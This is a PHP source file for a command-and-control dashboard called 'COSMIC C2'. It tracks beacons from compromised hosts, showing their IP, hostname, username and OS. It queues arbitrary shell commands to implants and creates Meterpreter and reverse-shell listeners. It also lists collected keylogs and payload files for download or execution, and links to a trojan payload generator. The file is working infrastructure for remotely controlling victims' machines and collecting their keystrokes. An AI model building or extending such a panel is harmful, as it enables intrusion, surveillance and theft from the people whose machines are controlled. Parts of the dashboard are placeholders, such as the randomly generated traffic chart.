<?php session_start(); if (!isset($_SESSION["c2_user"])) { header("Location: login.php"); exit; } ?>
<?php
/**
 * COSMIC C2 v4.0 – SOVEREIGN PRISMATIC INTERFACE (PRODUCTION READY)
 * Professional Command & Control with Authentication, CSRF Protection,
 * Output Escaping, Pagination, and Graceful Error Handling.
 *
 * File: /public/c2-dashboard.php
 */

session_start();
require_once dirname(__DIR__) . '/includes/security_functions.php';
require_once dirname(__DIR__) . '/system/modules/C2Engine.php';

// ==================== AUTHENTICATION ====================
if (!isset($_SESSION['user'])) {
    header('Location: /login.php?redirect=' . urlencode($_SERVER['REQUEST_URI']));
    exit;
}

// ==================== CSRF PROTECTION ====================
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// ==================== INITIALIZE C2 ENGINE ====================
$c2 = new C2Engine();

// ==================== PAGINATION SETTINGS ====================
$page = isset($_GET['page']) ? max(1, (int)$_GET['page']) : 1;
$perPage = 50;
$offset = ($page - 1) * $perPage;

// ==================== HANDLE POST ACTIONS ====================
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
    // CSRF check
    if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
        die('Invalid CSRF token.');
    }

    try {
        switch ($_POST['action']) {
            case 'add_task':
                if (isset($_POST['payload_uuid'], $_POST['command'])) {
                    $c2->addTask($_POST['payload_uuid'], $_POST['command']);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Task added.'];
                }
                break;
            case 'create_listener':
                if (isset($_POST['name'], $_POST['lhost'], $_POST['lport'])) {
                    $payload_type = $_POST['payload_type'] ?? 'generic/shell_reverse_tcp';
                    $protocol = $_POST['protocol'] ?? 'tcp';
                    $c2->createListener($_POST['name'], $_POST['lhost'], $_POST['lport'], $protocol, $payload_type);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Listener created.'];
                }
                break;
            case 'start_listener':
                if (isset($_POST['listener_id'])) {
                    $c2->startListener((int)$_POST['listener_id']);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Listener started.'];
                }
                break;
            case 'stop_listener':
                if (isset($_POST['listener_id'])) {
                    $c2->stopListener((int)$_POST['listener_id']);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Listener stopped.'];
                }
                break;
            case 'delete_listener':
                if (isset($_POST['listener_id'])) {
                    $c2->deleteListener((int)$_POST['listener_id']);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Listener deleted.'];
                }
                break;
            case 'delete_task':
                if (isset($_POST['task_id'])) {
                    $c2->deleteTask((int)$_POST['task_id']);
                    $_SESSION['flash'] = ['type' => 'success', 'message' => 'Task deleted.'];
                }
                break;
            case 'delete_payload':
                if (isset($_POST['payload_uuid'])) {
                    // Placeholder – implement if needed
                    $_SESSION['flash'] = ['type' => 'warning', 'message' => 'Payload deletion not implemented.'];
                }
                break;
        }
    } catch (Exception $e) {
        log_security_event('C2_ACTION_ERROR', ['action' => $_POST['action'], 'error' => $e->getMessage()]);
        $_SESSION['flash'] = ['type' => 'error', 'message' => 'Action failed: ' . $e->getMessage()];
    }

    header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?'));
    exit;
}

// ==================== FETCH DATA WITH SAFE FALLBACKS ====================
$payloads = method_exists($c2, 'getPayloads') ? $c2->getPayloads(['status' => 'active']) : [];
$listeners = method_exists($c2, 'getListeners') ? $c2->getListeners() : [];
$stats = method_exists($c2, 'getStats') ? $c2->getStats() : [];
$beacons = method_exists($c2, 'getBeacons') ? $c2->getBeacons(null, $perPage, $offset) : [];
$tasks = method_exists($c2, 'getTasks') ? $c2->getTasks(null, null, $perPage, $offset) : [];

// Safe counts – if methods missing, compute manually
$totalBeacons = 0;
if (method_exists($c2, 'getBeaconCount')) {
    $totalBeacons = $c2->getBeaconCount();
} else {
    // Fallback: if we have beacons array, count it
    $totalBeacons = count($beacons);
}

$totalTasks = 0;
if (method_exists($c2, 'getTaskCount')) {
    $totalTasks = $c2->getTaskCount();
} else {
    $totalTasks = count($tasks);
}

// File listings with pagination
$payloadFiles = glob(dirname(__DIR__, 2) . '/data/payloads/*') ?: [];
$keylogFiles = glob(dirname(__DIR__, 2) . '/data/keylogs/*') ?: [];
$advancedPayloads = glob(dirname(__DIR__, 2) . '/data/advanced_payloads/*') ?: [];
$allPayloadFiles = array_merge($payloadFiles, $advancedPayloads);
$totalPayloadFiles = count($allPayloadFiles);
$payloadFilesPage = array_slice($allPayloadFiles, $offset, $perPage);

// C2 Nodes
$nodes = glob(__DIR__ . '/c2/nodes/*', GLOB_ONLYDIR) ?: [];
$nodeList = array_map('basename', $nodes);

// Flash message
$flash = $_SESSION['flash'] ?? null;
unset($_SESSION['flash']);

// Helper for escaping
function e($str) {
    return htmlspecialchars($str, ENT_QUOTES, 'UTF-8');
}

// Determine current view
$view = $_GET['view'] ?? 'dashboard';
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>COSMIC C2 v4.0 – SOVEREIGN</title>
    <link href="https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap" rel="stylesheet">
    <script src="https://cdn.jsdelivr.net/npm/chart.js@3.9.1/dist/chart.min.js"></script>
    <link rel="stylesheet" href="/assets/css/cosmic-c2.css">
    <script src="/assets/js/cosmic-c2.js" defer></script>
    <script src="/assets/js/c2-quicknav.js" defer></script>
    <style>
        .modal { display: none; position: fixed; z-index: 2000; left: 0; top: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); }
        .modal-content { background: var(--cosmic-glass); border: 2px solid var(--cosmic-neon-blue); margin: 5% auto; padding: 30px; width: 80%; max-width: 600px; border-radius: 16px; backdrop-filter: blur(15px); }
        .flash { padding: 15px; margin-bottom: 20px; border-radius: 8px; }
        .flash.success { background: rgba(0,255,0,0.2); border: 1px solid #0f0; }
        .flash.error { background: rgba(255,0,0,0.2); border: 1px solid #f00; }
        .flash.warning { background: rgba(255,255,0,0.2); border: 1px solid #ff0; }
        .pagination { display: flex; gap: 10px; justify-content: center; margin-top: 20px; }
        .pagination a { padding: 8px 12px; background: rgba(0,255,255,0.1); border: 1px solid #0ff; color: #0ff; text-decoration: none; }
        .pagination a.active { background: #0ff; color: #000; }
    </style>
</head>
<body class="cosmic-scroll-body">
    <div class="sidebar">
        <div class="sidebar-logo">
            <h2>🌀 COSMIC C2</h2>
            <div style="color: var(--cosmic-neon-blue); font-size: 0.8em; letter-spacing: 4px;">SOVEREIGN v4.0</div>
        </div>
        <ul class="sidebar-nav">
            <li><a href="?view=dashboard" class="<?= $view === 'dashboard' ? 'active' : '' ?>"><span>🎮</span> Dashboard</a></li>
            <li><a href="?view=payloads"><span>🎯</span> Payloads</a></li>
            <li><a href="?view=beacons"><span>📶</span> Beacons</a></li>
            <li><a href="?view=listeners"><span>📡</span> Listeners</a></li>
            <li><a href="?view=tasks"><span>⚡</span> Tasks</a></li>
            <li><a href="?view=files"><span>📁</span> File Manager</a></li>
            <li><a href="?view=nodes"><span>🌐</span> C2 Nodes</a></li>
            <li><a href="?view=files"><span>📁</span> File Manager</a></li>
            <li><a href="?view=traffic"><span>📊</span> Traffic</a></li>
            <li style="margin-top:30px;"><a href="cosmic-unified-dashboard.php"><span>🌀</span> Main Lab</a></li>
            <li><a href="c2-cli.sh"><span>💻</span> C2 CLI</a></li>
            <li><a href="/logout.php"><span>🚪</span> Logout</a></li>
        </ul>
    </div>

    <div class="main-content">
        <div class="quick-links">
            <a href="logout.php" class="btn">🚪 Logout</a>
            <a href="cosmic-unified-dashboard.php" class="btn btn-primary">🌀 UNIFIED DASHBOARD</a>
            <a href="trojan-dashboard.php?advanced=1" class="btn">🧬 GENERATE PAYLOAD</a>
            <a href="redteam-dashboard.php" class="btn">🔴 Red Team</a>
            <a href="c2-cli.sh" class="btn">💻 C2 CLI</a>
            <span style="flex:1"></span>
            <span style="color:var(--cosmic-neon-green);">
                <span class="beacon-pulse"></span> BEACON ACTIVE
            </span>
        </div>

        <?php if ($flash): ?>
        <div class="flash <?= e($flash['type']) ?>">
            <?= e($flash['message']) ?>
        </div>
        <?php endif; ?>

        <div class="cards-grid">
            <div class="stat-card">
                <div class="stat-value"><?= e($stats['payloads_active'] ?? 0) ?></div>
                <div class="stat-label">Active Payloads</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?= e($stats['beacons_today'] ?? 0) ?></div>
                <div class="stat-label">Beacons Today</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?= e($stats['tasks_pending'] ?? 0) ?></div>
                <div class="stat-label">Pending Tasks</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?= e(count($listeners)) ?></div>
                <div class="stat-label">Active Listeners</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?= e($totalPayloadFiles) ?></div>
                <div class="stat-label">Payload Files</div>
            </div>
            <div class="stat-card">
                <div class="stat-value"><?= e(count($nodeList)) ?></div>
                <div class="stat-label">C2 Nodes</div>
            </div>
        </div>

        <?php if ($view === 'dashboard'): ?>
        <div style="display: grid; grid-template-columns: 2fr 1fr; gap: 25px;">
            <div class="glass-panel">
                <h2>📶 Live Beacon Feed</h2>
                <table id="beacons-table">
                    <thead><tr><th>Time</th><th>Payload</th><th>IP</th><th>Country</th><th>Hostname</th><th>User</th><th>OS</th></tr></thead>
                    <tbody>
                        <?php foreach ($beacons as $b): ?>
                        <tr>
                            <td><?= e(date('H:i:s', $b['beacon_time'])) ?></td>
                            <td><?= e(substr($b['payload_uuid'], 0, 8)) ?>…</td>
                            <td><?= e($b['ip']) ?></td>
                            <td><?= e($b['country'] ?: '?') ?></td>
                            <td><?= e($b['hostname'] ?: '-') ?></td>
                            <td><?= e($b['username'] ?: '-') ?></td>
                            <td><?= e($b['os_info'] ?: '-') ?></td>
                        </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
                <?php if ($totalBeacons > $perPage): ?>
                <div class="pagination">
                    <?php for ($i = 1; $i <= ceil($totalBeacons / $perPage); $i++): ?>
                        <a href="?view=beacons&page=<?= $i ?>" class="<?= $i == $page ? 'active' : '' ?>"><?= $i ?></a>
                    <?php endfor; ?>
                </div>
                <?php endif; ?>
            </div>
            <div class="glass-panel">
                <h2>⚡ Quick Task</h2>
                <form method="post">
                    <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                    <input type="hidden" name="action" value="add_task">
                    <select name="payload_uuid" style="width:100%; margin-bottom:15px; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                        <option value="">Select payload...</option>
                        <?php foreach ($payloads as $p): ?>
                        <option value="<?= e($p['uuid']) ?>"><?= e(substr($p['uuid'],0,8)) ?> – <?= e($p['name']) ?></option>
                        <?php endforeach; ?>
                    </select>
                    <input type="text" name="command" placeholder="Enter command (e.g., whoami)" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:12px; border-radius:8px;" required>
                    <button type="submit" class="btn" style="margin-top:10px;">📤 Send</button>
                </form>
            </div>
        </div>
        <div class="glass-panel" style="margin-top:25px;">
            <h2>📊 Beacon Activity (Last 24h)</h2>
            <canvas id="trafficChart" style="height:250px;"></canvas>
        </div>

        <?php elseif ($view === 'payloads'): ?>
        <div class="glass-panel">
            <h2>🎯 Active Payloads</h2>
            <a href="trojan-dashboard.php?advanced=1" class="btn btn-primary">➕ Generate New</a>
            <table>
                <thead><tr><th>UUID</th><th>Name</th><th>Type</th><th>Platform</th><th>LHOST</th><th>LPORT</th><th>Last Seen</th><th>Actions</th></tr></thead>
                <tbody>
                    <?php foreach ($payloads as $p): ?>
                    <tr>
                        <td><?= e(substr($p['uuid'],0,8)) ?>…</td>
                        <td><?= e($p['name']) ?></td>
                        <td><?= e($p['type']) ?></td>
                        <td><?= e($p['platform']) ?></td>
                        <td><?= e($p['lhost']) ?></td>
                        <td><?= e($p['lport']) ?></td>
                        <td><?= $p['last_seen'] ? e(date('H:i:s', $p['last_seen'])) : 'Never' ?></td>
                        <td>
                            <button class="btn" onclick="openTaskModal('<?= e($p['uuid']) ?>')">⚡ Task</button>
                            <form method="post" style="display:inline;">
                                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                                <input type="hidden" name="action" value="delete_payload">
                                <input type="hidden" name="payload_uuid" value="<?= e($p['uuid']) ?>">
                                <button type="submit" class="btn btn-danger" onclick="return confirm('Delete this payload?')">🗑️</button>
                            </form>
                        </td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>

        <?php elseif ($view === 'beacons'): ?>
        <div class="glass-panel">
            <h2>📶 Complete Beacon History</h2>
            <table>
                <thead><tr><th>Time</th><th>Payload</th><th>IP</th><th>Country</th><th>Hostname</th><th>Username</th><th>OS</th><th>Arch</th></tr></thead>
                <tbody>
                    <?php
                    $allBeacons = method_exists($c2, 'getBeacons') ? $c2->getBeacons(null, $perPage, $offset) : [];
                    foreach ($allBeacons as $b):
                    ?>
                    <tr>
                        <td><?= e(date('Y-m-d H:i:s', $b['beacon_time'])) ?></td>
                        <td><?= e(substr($b['payload_uuid'],0,8)) ?>…</td>
                        <td><?= e($b['ip']) ?></td>
                        <td><?= e($b['country'] ?: '-') ?></td>
                        <td><?= e($b['hostname'] ?: '-') ?></td>
                        <td><?= e($b['username'] ?: '-') ?></td>
                        <td><?= e($b['os_info'] ?: '-') ?></td>
                        <td><?= e($b['architecture'] ?: '-') ?></td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
            <?php if ($totalBeacons > $perPage): ?>
            <div class="pagination">
                <?php for ($i = 1; $i <= ceil($totalBeacons / $perPage); $i++): ?>
                    <a href="?view=beacons&page=<?= $i ?>" class="<?= $i == $page ? 'active' : '' ?>"><?= $i ?></a>
                <?php endfor; ?>
            </div>
            <?php endif; ?>
        </div>

        <?php elseif ($view === 'listeners'): ?>
        <div class="glass-panel">
            <h2>📡 Listener Manager</h2>
            <button class="btn btn-primary" onclick="document.getElementById('listenerModal').style.display='block'">➕ Create Listener</button>
            <table>
                <thead><tr><th>ID</th><th>Name</th><th>Protocol</th><th>LHOST</th><th>LPORT</th><th>Payload Type</th><th>Status</th><th>PID</th><th>Actions</th></tr></thead>
                <tbody>
                    <?php foreach ($listeners as $l): ?>
                    <tr>
                        <td><?= e($l['id']) ?></td>
                        <td><?= e($l['name']) ?></td>
                        <td><?= e($l['protocol']) ?></td>
                        <td><?= e($l['lhost']) ?></td>
                        <td><?= e($l['lport']) ?></td>
                        <td><?= e($l['payload_type'] ?? 'generic/shell_reverse_tcp') ?></td>
                        <td><?= e($l['status']) ?></td>
                        <td><?= e($l['pid'] ?? '-') ?></td>
                        <td>
                            <?php if ($l['status'] == 'stopped'): ?>
                            <form method="post" style="display:inline;">
                                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                                <input type="hidden" name="action" value="start_listener">
                                <input type="hidden" name="listener_id" value="<?= e($l['id']) ?>">
                                <button type="submit" class="btn">▶ Start</button>
                            </form>
                            <?php else: ?>
                            <form method="post" style="display:inline;">
                                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                                <input type="hidden" name="action" value="stop_listener">
                                <input type="hidden" name="listener_id" value="<?= e($l['id']) ?>">
                                <button type="submit" class="btn btn-danger">⏹ Stop</button>
                            </form>
                            <?php endif; ?>
                            <button class="btn" onclick="viewListenerLog(<?= e($l['id']) ?>)">📄 Log</button>
                            <form method="post" style="display:inline;">
                                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                                <input type="hidden" name="action" value="delete_listener">
                                <input type="hidden" name="listener_id" value="<?= e($l['id']) ?>">
                                <button type="submit" class="btn btn-danger" onclick="return confirm('Delete listener?')">🗑️</button>
                            </form>
                        </td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
        </div>

        <?php elseif ($view === 'tasks'): ?>
        <div class="glass-panel">
            <h2>⚡ Task Queue</h2>
            <table>
                <thead><tr><th>ID</th><th>Payload</th><th>Command</th><th>Status</th><th>Created</th><th>Executed</th><th>Result</th><th>Action</th></tr></thead>
                <tbody>
                    <?php
                    $allTasks = method_exists($c2, 'getTasks') ? $c2->getTasks(null, null, $perPage, $offset) : [];
                    foreach ($allTasks as $t):
                    ?>
                    <tr>
                        <td><?= e($t['id']) ?></td>
                        <td><?= e(substr($t['payload_uuid'],0,8)) ?>…</td>
                        <td><?= e($t['command']) ?></td>
                        <td><?= e($t['status']) ?></td>
                        <td><?= e(date('H:i', $t['created_at'])) ?></td>
                        <td><?= $t['executed_at'] ? e(date('H:i', $t['executed_at'])) : '-' ?></td>
                        <td><?= e(substr($t['result']??'',0,30)) . (strlen($t['result']??'')>30?'…':'') ?></td>
                        <td>
                            <form method="post" style="display:inline;">
                                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                                <input type="hidden" name="action" value="delete_task">
                                <input type="hidden" name="task_id" value="<?= e($t['id']) ?>">
                                <button type="submit" class="btn btn-danger" onclick="return confirm('Delete task?')">🗑️</button>
                            </form>
                        </td>
                    </tr>
                    <?php endforeach; ?>
                </tbody>
            </table>
            <?php if ($totalTasks > $perPage): ?>
            <div class="pagination">
                <?php for ($i = 1; $i <= ceil($totalTasks / $perPage); $i++): ?>
                    <a href="?view=tasks&page=<?= $i ?>" class="<?= $i == $page ? 'active' : '' ?>"><?= $i ?></a>
                <?php endfor; ?>
            </div>
            <?php endif; ?>
        </div>

        <?php elseif ($view === 'files'): ?>
        <div class="glass-panel">
            <h2>📁 File Manager – Payloads & Keylogs</h2>
            <div style="display:flex; gap:20px; flex-wrap:wrap;">
                <div style="flex:1;">
                    <h3>📦 Payloads (Page <?= $page ?>)</h3>
                    <div class="file-grid">
                        <?php foreach ($payloadFilesPage as $file): ?>
                        <?php $name = basename($file); $size = filesize($file); ?>
                        <div class="file-item">
                            <div style="font-size:2em;">📄</div>
                            <div style="word-break:break-word; font-size:0.9em;"><?= e($name) ?></div>
                            <div style="font-size:0.8em; color:#0ff;"><?= e(round($size/1024,2)) ?> KB</div>
                            <div style="margin-top:10px; display:flex; gap:5px; justify-content:center;">
                                <button class="btn" style="padding:4px 8px; font-size:0.8em;" onclick="window.location.href='/download.php?file=<?= urlencode($name) ?>'">💾 Download</button>
                                <button class="btn" style="padding:4px 8px; font-size:0.8em;" onclick="executePayload('<?= e($name) ?>')">▶ Execute</button>
                            </div>
                        </div>
                        <?php endforeach; ?>
                    </div>
                    <?php if ($totalPayloadFiles > $perPage): ?>
                    <div class="pagination">
                        <?php for ($i = 1; $i <= ceil($totalPayloadFiles / $perPage); $i++): ?>
                            <a href="?view=files&page=<?= $i ?>" class="<?= $i == $page ? 'active' : '' ?>"><?= $i ?></a>
                        <?php endfor; ?>
                    </div>
                    <?php endif; ?>
                </div>
                <div style="flex:1;">
                    <h3>⌨️ Keylogs</h3>
                    <div class="file-grid">
                        <?php foreach ($keylogFiles as $file): ?>
                        <?php $name = basename($file); ?>
                        <div class="file-item" onclick="window.location.href='/download.php?file=<?= urlencode($name) ?>'">
                            <div style="font-size:2em;">📝</div>
                            <div><?= e($name) ?></div>
                        </div>
                        <?php endforeach; ?>
                    </div>
                </div>
            </div>
        </div>

        <?php elseif ($view === 'nodes'): ?>
        <div class="glass-panel">
            <h2>🌐 C2 Nodes (Sub‑Servers)</h2>
            <p style="color:#ccc;">Add sub‑C2 nodes by creating directories in <code>public/c2/nodes/</code>.</p>
            <div style="display:grid; grid-template-columns:repeat(auto-fit, minmax(250px,1fr)); gap:20px; margin-top:20px;">
                <?php if (empty($nodeList)): ?>
                <div style="background:rgba(255,0,0,0.1); border:1px solid #f00; padding:20px; border-radius:8px;">
                    No C2 nodes configured. Create a directory to spawn a sovereign sub‑C2.
                </div>
                <?php else: ?>
                    <?php foreach ($nodeList as $node): ?>
                    <div style="background:rgba(0,255,0,0.05); border:1px solid #0f0; padding:20px; border-radius:8px;">
                        <h3 style="color:#0ff; margin-bottom:10px;">🌀 <?= e($node) ?></h3>
                        <p><a href="/c2/nodes/<?= e($node) ?>/" style="color:#0f0;">→ Access Node</a></p>
                    </div>
                    <?php endforeach; ?>
                <?php endif; ?>
            </div>
        </div>

        <?php elseif ($view === 'traffic'): ?>
        <div class="glass-panel">
            <h2>📊 Network Traffic Analysis</h2>
            <canvas id="trafficFullChart" style="height:300px;"></canvas>
            <p style="margin-top:20px;">Real‑time beacon simulation – coming soon.</p>
        </div>
        <?php endif; ?>
    </div>

    <!-- Task Modal -->
    <div id="taskModal" class="modal">
        <div class="modal-content">
            <span onclick="closeModal()" style="float:right; color:#f00; font-size:2em; cursor:pointer;">&times;</span>
            <h2 style="color:var(--cosmic-neon-green);">⚡ Send Command</h2>
            <form method="post">
                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                <input type="hidden" name="action" value="add_task">
                <input type="hidden" name="payload_uuid" id="task-payload-uuid">
                <div style="margin-bottom:20px;">
                    <label style="color:#0ff;">Command:</label>
                    <textarea name="command" rows="5" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:12px; border-radius:8px;" required></textarea>
                </div>
                <button type="submit" class="btn btn-primary">📤 Execute</button>
            </form>
        </div>
    </div>

    <!-- Listener Modal -->
    <div id="listenerModal" class="modal">
        <div class="modal-content">
            <span onclick="closeModal()" style="float:right; color:#f00; font-size:2em; cursor:pointer;">&times;</span>
            <h2 style="color:var(--cosmic-neon-green);">➕ Create Listener</h2>
            <form method="post">
                <input type="hidden" name="csrf_token" value="<?= e($_SESSION['csrf_token']) ?>">
                <input type="hidden" name="action" value="create_listener">
                <div style="margin-bottom:15px;">
                    <label>Name:</label>
                    <input type="text" name="name" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <div style="margin-bottom:15px;">
                    <label>Protocol:</label>
                    <select name="protocol" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                        <option value="tcp">TCP</option>
                        <option value="http">HTTP</option>
                        <option value="https">HTTPS</option>
                    </select>
                </div>
                <div style="margin-bottom:15px;">
                    <label>Payload Type:</label>
                    <select name="payload_type" style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                        <option value="generic/shell_reverse_tcp">Generic Shell Reverse TCP</option>
                        <option value="windows/meterpreter/reverse_tcp">Windows Meterpreter Reverse TCP</option>
                        <option value="linux/x86/meterpreter/reverse_tcp">Linux Meterpreter Reverse TCP</option>
                        <option value="android/meterpreter/reverse_tcp">Android Meterpreter Reverse TCP</option>
                        <option value="osx/x64/meterpreter/reverse_tcp">macOS Meterpreter Reverse TCP</option>
                        <option value="tcp_raw">TCP Raw (netcat)</option>
                    </select>
                </div>
                <div style="margin-bottom:15px;">
                    <label>LHOST:</label>
                    <input type="text" name="lhost" value="0.0.0.0" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <div style="margin-bottom:15px;">
                    <label>LPORT:</label>
                    <input type="number" name="lport" value="4444" required style="width:100%; background:#000; color:#0ff; border:1px solid #0ff; padding:10px;">
                </div>
                <button type="submit" class="btn btn-primary">✅ Create</button>
            </form>
        </div>
    </div>

    <script>
        const csrfToken = '<?= e($_SESSION['csrf_token']) ?>';

        function openTaskModal(uuid) {
            document.getElementById('task-payload-uuid').value = uuid;
            document.getElementById('taskModal').style.display = 'block';
        }

        function closeModal() {
            document.querySelectorAll('.modal').forEach(m => m.style.display = 'none');
        }

        function viewListenerLog(id) {
            fetch('/c2/api/listener_log.php?id=' + id, {
                headers: { 'X-CSRF-Token': csrfToken }
            })
            .then(r => r.text())
            .then(log => alert('Listener Log:\n' + log))
            .catch(err => alert('Error: ' + err));
        }

        function executePayload(filename) {
            if (!confirm('Execute ' + filename + ' on local machine? This will run the payload.')) return;
            fetch('/c2/api/execute_payload.php', {
                method: 'POST',
                headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
                body: 'filename=' + encodeURIComponent(filename) + '&csrf=' + encodeURIComponent(csrfToken)
            })
            .then(r => r.json())
            .then(data => {
                alert('Execution result: ' + (data.output || 'No output') + '\nExit code: ' + data.exit_code);
                if (data.status === 'success') {
                    setTimeout(() => location.reload(), 2000);
                }
            })
            .catch(err => alert('Error: ' + err));
        }

        window.onload = function() {
            const ctx = document.getElementById('trafficChart')?.getContext('2d');
            if (ctx) {
                new Chart(ctx, {
                    type: 'line',
                    data: {
                        labels: Array.from({length:24}, (_,i) => i+'h'),
                        datasets: [{
                            label: 'Beacons',
                            data: Array.from({length:24}, () => Math.floor(Math.random()*10)),
                            borderColor: '#00ff9d',
                            backgroundColor: 'rgba(0,255,157,0.1)',
                            tension: 0.4
                        }]
                    },
                    options: {
                        scales: { y: { beginAtZero: true, grid: { color: 'rgba(0,255,255,0.1)' } } },
                        plugins: { legend: { labels: { color: '#0ff' } } }
                    }
                });
            }
        };
    </script>
</body>
</html>
